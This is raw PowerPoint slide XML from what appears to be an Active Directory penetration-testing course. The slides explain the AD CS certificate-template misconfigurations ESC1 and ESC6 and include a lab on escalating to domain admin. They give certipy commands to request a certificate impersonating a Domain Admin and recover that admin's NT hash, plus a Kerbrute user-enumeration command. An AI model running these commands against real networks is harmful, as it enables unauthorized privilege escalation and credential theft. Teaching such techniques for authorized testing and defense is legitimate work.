      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13907695-6CBA-AE7B-5CF6-3FCD9B32E8D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4355184" y="1037354"/>
            <a:ext cx="4175947" cy="578885"/>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285750" indent="-285750" defTabSz="914400">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" kern="0" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Subject Alternative Name (SPN): Specifies additional user(name)s that the certificate can be used to login as.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{421CE64C-4EDD-6BAE-38E2-4E066262FCAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="176359" y="3316443"/>
            <a:ext cx="8440700" cy="1153754"/>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171450" indent="-171450" defTabSz="914400">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" kern="0" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>So, what happens if a low-privileged user specify a Domain Administrator’s username in SAN? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37834220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Misconfigured Certificate Templates: ESC1</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52</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1037644"/>
            <a:ext cx="4656635" cy="3681589"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>When requesting a certificate, the requester defines the template they want</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Templates can contain misconfigurations that allow for privilege escalation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Enrollment Rights </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>section specifies that any authenticated user can request a certificate based on this template.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>msPKI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>-Certificates-Name-Flag: ENROLLEE_SUPPLIES_SUBJECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>field specifies that any user allowed to request a certificate based on this template, can also specify SPN's to be included inside of the certificate. This allows the user to obtain an authentication certificate as anyone else in the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4859606" y="3182821"/>
            <a:ext cx="4283807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0"/>
              <a:t>Picture Taken From: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-misconfigured-certificate-template-to-domain-admin#finding-vulnerable-certificate-templates</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 9" descr="vuln-template.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B350346-BD05-94B5-E22C-601F5D195AAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5058866" y="964738"/>
            <a:ext cx="3676795" cy="2214988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9304B63C-E93C-11B1-C71C-7F18B05E015B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4770935" y="663551"/>
            <a:ext cx="4287558"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ea typeface="IBM Plex Sans" charset="0"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Misconfigured Template</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{432EAA0C-EA65-2C61-8D1F-FC0E7EACDF83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5706385" y="3456812"/>
            <a:ext cx="1971675" cy="1571625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4097906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Privilege Escalation &gt; Misconfigured Certificate Templates: ESC1 – How To</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53</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1037645"/>
            <a:ext cx="8538730" cy="3359062"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Request a certificate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>certipy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> req -u &lt;user&gt;@&lt;domain&gt; -p &lt;pass&gt; -ca &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>CAname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>&gt; -target &lt;CA-FQDN&gt; -template &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Templatename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>&gt; -alt &lt;DA&gt; -out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>pwned</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" err="1">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Auth as that user and get their NT hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>certipy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t> auth -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>pfx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>pwned.pfx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t> -username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>domainAdmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t> -domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>domain.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t> -dc-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>dcip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:b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4816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Certificate Authority Allows Rogue SAN's : ESC6 </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54</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5"/>
            <a:ext cx="4295484" cy="3580850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>A certificate authority has overall configuration settings that apply to every template in the environment. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>A configuration setting named: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>EDITF_ATTRIBUTESUBJECTALTNAME2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>allows users to specify both the subject and subject alternative name for requested certificates.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>THIS SETTING RESULTS IN ANY USER BEING ABLE TO REQUEST A CERTIFICATE AS ANYONE ELSE, NO MATTER THE INDIVIDUAL CERTIFICATE TEMPLATE CONFIGURATIONS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Exploited the exact same as ESC1, exact it can be done on any template that a user can enroll in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F56B1BB5-B57F-0081-54D7-FC68355E6C17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="22727" r="22727"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="972292" y="6649026"/>
            <a:ext cx="4566356" cy="2811571"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>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0" name="Picture 10" descr="0 bypq3gWUk98SB8Vw.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DF277CA-DA07-3848-7C27-F75C1CE6735F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5232536" y="2568285"/>
            <a:ext cx="2986869" cy="1831917"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{097ED334-A475-3BFC-8DC2-B9CA8B267C02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645546" y="1132740"/>
            <a:ext cx="4476964" cy="1253567"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="749616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DA Privilege Escalation &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="770C28"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lab 4</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55</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a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>We have a domain user, admin on some hosts, but still no domain admin!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Let’s try some of the previous techniques to escalate ourselves to domain admin: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Printerbug</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>ADCS ESC 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>ADCS ESC 6</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977190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t>DA, now what? &gt; Password Reuse into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Kerbrute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" err="1"/>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dirty="0" smtClean="0"/>
              <a:pPr/>
              <a:t>56</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90663"/>
            <a:ext cx="8233724" cy="3501937"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>We need to discover valid users in our new domain:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>We should see if users that existed in our previous domain also exist within our new target. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Windows responds with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>when asking for an invalid user. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>We can do this with a tool known as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Kerbrute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="663575" lvl="3" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>First extract the usernames from the previous domain into a text file.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr marL="663575" lvl="3" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Then run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Kerbrute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>kerbrute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>userenum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>domain.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> --dc &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>ipOfDc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt; usernames.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRP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1711722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57</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1037645"/>
            <a:ext cx="8652709" cy="3068210"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
